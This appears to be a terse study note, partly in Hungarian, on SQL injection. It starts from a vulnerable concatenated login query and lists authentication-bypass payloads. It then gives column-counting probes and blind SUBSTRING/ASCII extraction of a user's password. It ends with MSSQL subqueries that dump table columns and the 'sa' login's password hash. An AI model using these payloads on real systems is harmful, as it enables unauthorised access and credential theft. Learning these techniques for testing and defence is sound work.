strsql = "SELECT * FROM tbl WHERE username='" + usernev + "' AND password='" + password +"';"



SELECT * FROM tbl WHERE username='' OR 1=1' AND password ='YYYYYYYYY';

' OR '1'='1
' OR 1=1--

hány oszlopa van a tablanak?

SELECT * FROM tbl WHERE username='' ORDER BY 3--


SELECT * FROM tbl WHERE (username='XXXXX') AND (password='YYYYYY');
' OR 1=1)--
SELECT * FROM tbl WHERE (username='' OR 1=1--) AND  (password='YYYYYY');

' OR 1=1--
' OR 1=1#
' OR 1=1/*

" OR 1=1--
" OR 1=1#
" OR 1=1/*

' OR '1'='1
" OR "1"="1

SELECT * FROM tbl WHERE username='XXX' AND password='YYYY'
' OR 1=1--
SELECT * FROM tbl WHERE username=''' OR 1=1--' AND password='YYYY'
\' OR 1=1--
SELECT * FROM tbl WHERE username='\'' OR 1=1--' AND password='YYYY'

------------------

tudjuk meg a name felhasznalo jelszavat.

password 

SELECT * FROM tbl WHERE username='name' AND password='a'--' AND password='YYYY'

62^jelszo hossza

SELECT * FROM tbl WHERE username='name' AND SUBSTRING(password,1,1)='a'-- AND password='YYYY'
62*jelszo hossza

SELECT * FROM tbl WHERE username='name' AND SUBSTRING(password,1,1)>'a'-- AND password='YYYY'
6*jelszo

SELECT * FROM tbl where username='name' AND ASCII(SUBSTRING(password,1,1))>128 -- AND password='YYYY'

power sql injector 
eleje	 vary		 vege
name'	password	)--

vary:
(SELECT text FROM sys.dm_exec_sql_text(cast((select SQL_handle FROM sys.sysprocesses WHERE spid=@@spid) as varbinary(64))))

(SELECT name,xtype FROM sys.syscolumns WHERE id=object_id('tbl1') FOR XML AUTO)

(SELECT cast(password as varbinary(888)) as password from master..syslogins WHERE name='sa' FOR XML raw, binary base64)

UNION ALL SELECT NULL,NULL,NULL,NULL,NULL FROM tbl1--